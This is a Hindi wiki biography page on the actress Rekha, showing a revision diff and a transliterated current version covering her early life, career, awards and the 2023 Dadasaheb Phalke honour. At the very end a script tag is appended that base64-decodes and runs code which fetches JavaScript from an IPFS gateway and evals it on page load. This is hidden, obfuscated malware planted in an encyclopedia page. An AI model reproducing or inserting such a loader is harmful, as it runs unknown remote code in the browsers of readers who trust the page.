Difference between revisions of "रेखा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(One intermediate revision by one other user not shown)
Line 3: Line 3:
 
|चित्र का नाम=रेखा
 
|चित्र का नाम=रेखा
 
|पूरा नाम=भानुरेखा गणेशन
 
|पूरा नाम=भानुरेखा गणेशन
|प्रसिद्ध नाम=
+
|प्रसिद्ध नाम=रेखा
 
|अन्य नाम=
 
|अन्य नाम=
 
|जन्म=[[10 अक्टूबर]], [[1954]]
 
|जन्म=[[10 अक्टूबर]], [[1954]]
|जन्म भूमि=[[तमिलनाडु]]
+
|जन्म भूमि=[[चेन्नई]], [[तमिलनाडु]]
 
|मृत्यु=
 
|मृत्यु=
 
|मृत्यु स्थान=
 
|मृत्यु स्थान=
|अभिभावक=जेमिनी गनेशन और पुष्पावली
+
|अभिभावक=[[पिता]]- जेमिनी गणेशन<br/>
 +
[[माता]]- पुष्पावली
 
|पति/पत्नी=मुकेश अग्रवाल
 
|पति/पत्नी=मुकेश अग्रवाल
 
|संतान=
 
|संतान=
|कर्म भूमि=
+
|कर्म भूमि=[[महाराष्ट्र]]
 
|कर्म-क्षेत्र=[[अभिनेत्री]]
 
|कर्म-क्षेत्र=[[अभिनेत्री]]
 
|मुख्य रचनाएँ=
 
|मुख्य रचनाएँ=
|मुख्य फ़िल्में='खूबसूरत', 'उमराव जान', 'खून', 'सिलसिल'
+
|मुख्य फ़िल्में='खूबसूरत', 'उमराव जान', 'खून', 'सिलसिला' आदि।
 
भरी मांग”
 
भरी मांग”
 
|विषय=
 
|विषय=
 
|शिक्षा=
 
|शिक्षा=
 
|विद्यालय=
 
|विद्यालय=
|पुरस्कार-उपाधि=[[पद्म श्री]], फ़िल्मफेयर सर्वश्रेष्ठ अभिनेत्री (दो बार), [[राष्ट्रीय फ़िल्म पुरस्कार]] सर्वश्रेष्ठ अभिनेत्री  
+
|पुरस्कार-उपाधि=[[दादा साहब फाल्के पुरस्कार]], [[2023]]<br/>
|प्रसिद्धि=
+
[[पद्म श्री]]<br/>
 +
फ़िल्मफेयर सर्वश्रेष्ठ अभिनेत्री (दो बार)<br/>
 +
[[राष्ट्रीय फ़िल्म पुरस्कार]] सर्वश्रेष्ठ अभिनेत्री
 +
|प्रसिद्धि=अभिनेत्री, नृत्यांगना
 
|विशेष योगदान=
 
|विशेष योगदान=
 
|नागरिकता=भारतीय  
 
|नागरिकता=भारतीय  
Line 31: Line 35:
 
|अन्य जानकारी=रेखा [[1966]] में फ़िल्मों में आ गईं थी। इन्होंने अपनी पहली [[तेलुगु]] फ़िल्म 'रंगुला रतलाम' जिसमें एक बाल कलाकार के रूप में भूमिका निभाई थी, लेकिन [[हिंदी सिनेमा]] में उनकी शुरुआत [[1970]] में आई फ़िल्म 'सावन भादों' से हुई।  
 
|अन्य जानकारी=रेखा [[1966]] में फ़िल्मों में आ गईं थी। इन्होंने अपनी पहली [[तेलुगु]] फ़िल्म 'रंगुला रतलाम' जिसमें एक बाल कलाकार के रूप में भूमिका निभाई थी, लेकिन [[हिंदी सिनेमा]] में उनकी शुरुआत [[1970]] में आई फ़िल्म 'सावन भादों' से हुई।  
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
|अद्यतन={{अद्यतन|16:21, 8 जून 2017 (IST)}}
+
|अद्यतन={{अद्यतन|16:41, 20 सितम्बर 2023 (IST)}}
 
}}
 
}}
'''रेखा गनेशन''' ([[अंग्रेज़ी]]:Rekha Ganeshan) (जन्म- [[10 अक्टूबर]] [[1954]] [[तमिलनाडु]]) [[हिन्दी]] फ़िल्मों की सुप्रसिद्ध [[अभिनेत्री]] हैं। अपनी वर्सटैलिटी और [[हिन्दी फ़िल्म|हिन्दी फ़िल्मों]] की बेहतरीन [[अभिनेत्री]] मानी जाने वाली रेखा ने अपने करियर की शुरूआत [[1966]] में बाल कलाकार के तौर पर [[तेलुगु]] फ़िल्म 'रंगुला रतलाम' सेे की थी।<ref name="aa"/>
+
'''रेखा गनेशन''' ([[अंग्रेज़ी]]: ''Rekha Ganeshan'', जन्म- [[10 अक्टूबर]], [[1954]], [[तमिलनाडु]]) [[हिन्दी]] फ़िल्मों की सुप्रसिद्ध [[अभिनेत्री]] हैं। अपनी वर्सटैलिटी और [[हिन्दी फ़िल्म|हिन्दी फ़िल्मों]] की बेहतरीन [[अभिनेत्री]] मानी जाने वाली रेखा ने अपने कॅरियर की शुरूआत सन [[1966]] में बाल कलाकार के तौर पर [[तेलुगु]] फ़िल्म 'रंगुला रतलाम' सेे की थी।<ref name="aa"/> फिल्म उद्योग में उत्कृष्ट योगदान के लिए वर्ष [[2023]] में अभिनेत्री रेखा को [[दादा साहब फाल्के पुरस्कार]] से भी सम्मानित किया गया।
 
==जीवन परिचय==
 
==जीवन परिचय==
 
{{main|रेखा का जीवन परिचय}}
 
{{main|रेखा का जीवन परिचय}}
रेखा का पूरा नाम 'भानुरेखा गणेशन' है। इनका जन्म [[10 अक्टूबर]] [[1954]] को [[तमिलनाडु]] में हुआ। कहा जाता है रेखा ने जब फ़िल्मी जीवन की शुरुआत की थी तब वो काफी मोटी थी। उस समय किसी ने सोचा भी नहीं होगा कि एक मोटी सी लड़की आगे जाकर [[बॉलीवुड]] की सदाबहार अभिनेत्री बन जाएगी। रेखा ने सिर्फ व्यावसायिक फ़िल्में की हैं। बल्कि कलात्मक फ़िल्मों से भी उन्होंने अपने अभिनय की छाप छोड़ी है। रेखा [[1966]] में फ़िल्मों में आ गईं थी। इन्होंने अपनी पहली [[तेलुगु]] फ़िल्म 'रंगुला रतलाम' जिसमें एक बाल कलाकार के रूप में भूमिका निभाई थी, लेकिन [[हिंदी सिनेमा]] में उनकी शुरुआत [[1970]] में आई फ़िल्म 'सावन भादों' से हुई।<ref name="aa"/>  
+
रेखा का पूरा नाम 'भानुरेखा गणेशन' है। इनका जन्म [[10 अक्टूबर]] [[1954]] को [[तमिलनाडु]] में हुआ। कहा जाता है रेखा ने जब फ़िल्मी जीवन की शुरुआत की थी तब वो काफ़ी मोटी थी। उस समय किसी ने सोचा भी नहीं होगा कि एक मोटी सी लड़की आगे जाकर [[बॉलीवुड]] की सदाबहार अभिनेत्री बन जाएगी। रेखा ने सिर्फ व्यावसायिक फ़िल्में की हैं। बल्कि कलात्मक फ़िल्मों से भी उन्होंने अपने अभिनय की छाप छोड़ी है। रेखा [[1966]] में फ़िल्मों में आ गईं थी। इन्होंने अपनी पहली [[तेलुगु]] फ़िल्म 'रंगुला रतलाम' जिसमें एक बाल कलाकार के रूप में भूमिका निभाई थी, लेकिन [[हिंदी सिनेमा]] में उनकी शुरुआत [[1970]] में आई फ़िल्म 'सावन भादों' से हुई।<ref name="aa"/>  
 
==फ़िल्मी कॅरियर==
 
==फ़िल्मी कॅरियर==
 
{{main|रेखा का फ़िल्मी कॅरियर}}
 
{{main|रेखा का फ़िल्मी कॅरियर}}
Line 49: Line 53:
 
#सर्वश्रेष्ठ अभिनेत्री के लिए फ़िल्मफेयर अवार्ड - [[1989]] -फ़िल्म- 'खून भरी मांग'
 
#सर्वश्रेष्ठ अभिनेत्री के लिए फ़िल्मफेयर अवार्ड - [[1989]] -फ़िल्म- 'खून भरी मांग'
 
#सर्वश्रेष्ठ सहायक अभिनेत्री के लिए फ़िल्मफेयर अवार्ड और सबसे अच्छी खलनायिका के लिए स्टार स्क्रीन अवार्ड - [[1997]] - फ़िल्म- 'खिलाड़ीयों का खिलाड़ी'
 
#सर्वश्रेष्ठ सहायक अभिनेत्री के लिए फ़िल्मफेयर अवार्ड और सबसे अच्छी खलनायिका के लिए स्टार स्क्रीन अवार्ड - [[1997]] - फ़िल्म- 'खिलाड़ीयों का खिलाड़ी'
#सर्वश्रेष्ठ सहायक अभिनेत्री’ के लिए बॉलीवुड फ़िल्म अवार्ड - [[2004]] - फ़िल्म- 'कोई मिल गया'<ref name="bb"/>
+
#सर्वश्रेष्ठ सहायक अभिनेत्री’ के लिए बॉलीवुड फ़िल्म अवार्ड-[[2004]], फ़िल्म-'कोई मिल गया'<ref name="bb"/>
 
+
#[[दादा साहब फाल्के पुरस्कार]], [[2023]]
 
==प्रतिभा कौशल==
 
==प्रतिभा कौशल==
 
{{main|रेखा की प्रतिभा और कौशल}}
 
{{main|रेखा की प्रतिभा और कौशल}}
Line 59: Line 63:
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
 
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
 
 
==संबंधित लेख==
 
==संबंधित लेख==
{{अभिनेत्री}}
+
{{दादा साहब फाल्के पुरस्कार}}{{अभिनेत्री}}
 +
[[Category:अभिनेत्री]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:दादा साहब फाल्के पुरस्कार]]
 +
[[Category:पद्म श्री]][[Category:सिनेमा]][[Category:कला कोश]][[Category:चरित कोश]][[Category:सिनेमा कोश]][[Category:जीवनी साहित्य]]
 +
__NOTOC__
 
__INDEX__
 
__INDEX__
[[Category:अभिनेत्री]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:पद्म श्री]][[Category:सिनेमा]][[Category:कला कोश]]
 
__NOTOC__
 

Latest revision as of 11:11, 20 September 2023

rekha
poora nam bhanurekha ganeshan
prasiddh nam rekha
janm 10 aktoobar, 1954
janm bhoomi chennee, tamilanadu
abhibhavak pita- jemini ganeshan

mata- pushpavali

pati/patni mukesh agraval
karm bhoomi maharashtr
karm-kshetr abhinetri
mukhy filmean 'khoobasoorat', 'umarav jan', 'khoon', 'silasila' adi.

bhari maang”

puraskar-upadhi dada sahab phalke puraskar, 2023

padm shri
filmapheyar sarvashreshth abhinetri (do bar)
rashtriy film puraskar sarvashreshth abhinetri

prasiddhi abhinetri, nrityaangana
nagarikata bharatiy
any janakari rekha 1966 mean filmoan mean a geean thi. inhoanne apani pahali telugu film 'rangula ratalam' jisamean ek bal kalakar ke roop mean bhoomika nibhaee thi, lekin hiandi sinema mean unaki shuruat 1970 mean aee film 'savan bhadoan' se huee.
adyatan‎

rekha ganeshan (aangrezi: Rekha Ganeshan, janm- 10 aktoobar, 1954, tamilanadu) hindi filmoan ki suprasiddh abhinetri haian. apani varsatailiti aur hindi filmoan ki behatarin abhinetri mani jane vali rekha ne apane kॅriyar ki shurooat san 1966 mean bal kalakar ke taur par telugu film 'rangula ratalam' see ki thi.[1] philm udyog mean utkrisht yogadan ke lie varsh 2023 mean abhinetri rekha ko dada sahab phalke puraskar se bhi sammanit kiya gaya.

jivan parichay

  1. REDIRECTsaancha:mukhy

rekha ka poora nam 'bhanurekha ganeshan' hai. inaka janm 10 aktoobar 1954 ko tamilanadu mean hua. kaha jata hai rekha ne jab filmi jivan ki shuruat ki thi tab vo kafi moti thi. us samay kisi ne socha bhi nahian hoga ki ek moti si l daki age jakar b aaulivud ki sadabahar abhinetri ban jaegi. rekha ne sirph vyavasayik filmean ki haian. balki kalatmak filmoan se bhi unhoanne apane abhinay ki chhap chho di hai. rekha 1966 mean filmoan mean a geean thi. inhoanne apani pahali telugu film 'rangula ratalam' jisamean ek bal kalakar ke roop mean bhoomika nibhaee thi, lekin hiandi sinema mean unaki shuruat 1970 mean aee film 'savan bhadoan' se huee.[1]

filmi kॅriyar

  1. REDIRECTsaancha:mukhy

rekha bal kalakar ke taur par telugu film 'rangula ratalam' mean dikhaee dian jisamean unaka nam 'bebi bhanurekha' bataya gaya. 1969 mean abhinetri ke roop mean unhoanne apana debyoo saphal kann d film 'aॅpareshan jaikapat nalli siaeedi 999' se kiya tha jisamean unake hiro rajakumar the. usi sal unaki pahali hindi film 'aanjana saphar' rilij huee thi. film ke ek kisiang sin ke vivad ke chalate yah film nahian rilij ho paee. bad mean is film ko 'do shikari' ke nam se rilij kiya gaya. unaka abhinay mean koee iantrest nahian tha lekin arthik tangi hone ki vajah se unhoanne yah kiya. yah unake jivan ka kathin samay tha. 1970 mean unaki do filmean rilij hueean -telugu film 'amma kosam' aur hindi film 'savan bhado' jo ki unaki b aaulivud mean abhinetri ke taur par debyoo film mani jati hai. 'savan bhadoan' hit rahi aur rekha ratoan rat star ban geean.[1]

samman v puraskar

  1. REDIRECTsaancha:mukhy

rekha ki kuchh sarahaniy filmean is prakar hai, jinake lie unhean bahut saraha gaya aur kuchh filmoan ke lie unhean puraskar bhi mile.

  1. sarvashreshth abhinetri ke lie filmapheyar avard- 1981 - film- 'khoobasoorat'
  2. sarvashreshth abhinetri ke lie rashtriy film puraskar- 1982 - film- 'umarav jan'
  3. sarvashreshth hiandi abhinetri ke lie bangal film sanvadadata sangh avard - 1985 - film- 'utsav'
  4. sarvashreshth abhinetri ke lie filmapheyar avard - 1989 -film- 'khoon bhari maang'
  5. sarvashreshth sahayak abhinetri ke lie filmapheyar avard aur sabase achchhi khalanayika ke lie star skrin avard - 1997 - film- 'khila diyoan ka khila di'
  6. sarvashreshth sahayak abhinetri’ ke lie b aaulivud film avard-2004, film-'koee mil gaya'[2]
  7. dada sahab phalke puraskar, 2023

pratibha kaushal

  1. REDIRECTsaancha:mukhy

rekha n sirph ek achchhi abhinetri hai, sath hi ve ek achchhi iansan bhi hai. 2011 mean inako behatarin saphal aur sahaj abhinetri ka avard bhi mila. ye b aaulivud ki 9vian sabase b di saphal abhinetri rahian.[2]

age jaean »


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 jivani (hindi) filmibeat.com. abhigaman tithi: 8 joon, 2017.
  2. 2.0 2.1 rekha ka jivan parichay (hindi) deepawali.co.in. abhigaman tithi: 8 joon, 2017.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>